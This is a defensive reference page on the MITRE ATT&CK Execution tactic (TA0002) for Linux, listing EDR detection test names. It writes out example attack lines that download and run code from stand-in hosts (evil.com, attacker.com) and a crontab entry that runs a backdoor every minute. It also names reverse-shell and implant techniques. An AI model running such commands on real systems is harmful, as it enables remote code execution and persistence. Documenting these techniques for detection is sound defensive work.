Objective:

• Run malicious code on the compromised system to achieve operational goals. Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.

• ID: TA0002:

  • https://attack.mitre.org/tactics/TA0002/

Linux Context:

Execution on Linux leverages its rich command-line ecosystem. Attackers execute payloads via bash, sh, or alternative shells like zsh, often chaining commands with pipes or redirects (e.g., curl http://evil.com/script.sh | bash). Legitimate utilities—wget, python, or perl—are abused to download and run code, blending into normal admin activity. Scheduled tasks via cron (e.g., crontab -e) or systemd timers ensure repeated execution, while attackers may exploit running services (e.g., injecting into httpd) to launch payloads. In cloud environments, compromised containers might execute malicious images pulled from the Docker Hub. Fileless attacks using /dev/shm or /proc/self/exe further complicate detection.

Key Techniques:

• Command and Scripting Interpreter (T1059): Executing a malicious .sh file.

• Scheduled Task/Job (T1053): Setting a cron job to run a backdoor every minute.

• Native API (T1106): Calling execve() in a custom binary.

Flow Example:

• An attacker runs wget -O- http://attacker.com/malware | sh to fetch and execute a script or adds * * * * * /bin/bash -c "/tmp/backdoor" to /etc/crontab.

Defender Strategies:

• Monitor process creation and restrict execution permissions. Use EDR engines to detect anomalous command-line patterns.

The current list of corresponding EDRmetry test definitions includes:

• EDR-T6138 - Bash HTTP GET data with /dev/tcp

• EDR-T6122 - Dump process memory via GDB

• EDR-T6009 - eBPF system("whoami") Execution with bpftrace

• EDR-T6025 - Encrypted ELF implant

• EDR-T6094 - Establish Unix Socket connection

• EDR-T6041 - Execute binary listening from a hidden directory as root

• EDR-T6085 - Execute Linux Hack Tools

• EDR-T6099 - Execute LKM call_usermodehelper() on ICMP

• EDR-T6205 - Export proxy_http

• EDR-T6039 - File Transfer to a hidden directory

• EDR-T0003 - Install suspicious RPM package

• EDR-T6086 - LKM Load/unload kernel module

• EDR-T6051 - Modify core_pattern file

• EDR-T6177 - MySQL UDF Command Execution

• EDR-T6173 - OpenSSL - hackshell download without curl

• EDR-T6174 - Perl - File download without curl

• EDR-T6172 - Python - File download without curl

• EDR-T6247 - Python GET File over Network

• EDR-T6203 - Renice or Ulimit Execution

• EDR-T6123.004 - Revshell mkfifo+nc

• EDR-T6171 - Simplest Proc Name Masquerading

• EDR-T6278 - Execute mknod/mkfifo

• EDR-T6302 - K8S - Sidecar injection

• EDR-T6379 - K8S - Exec into pod

• EDR-T6340 - Python HTTP POST and Exec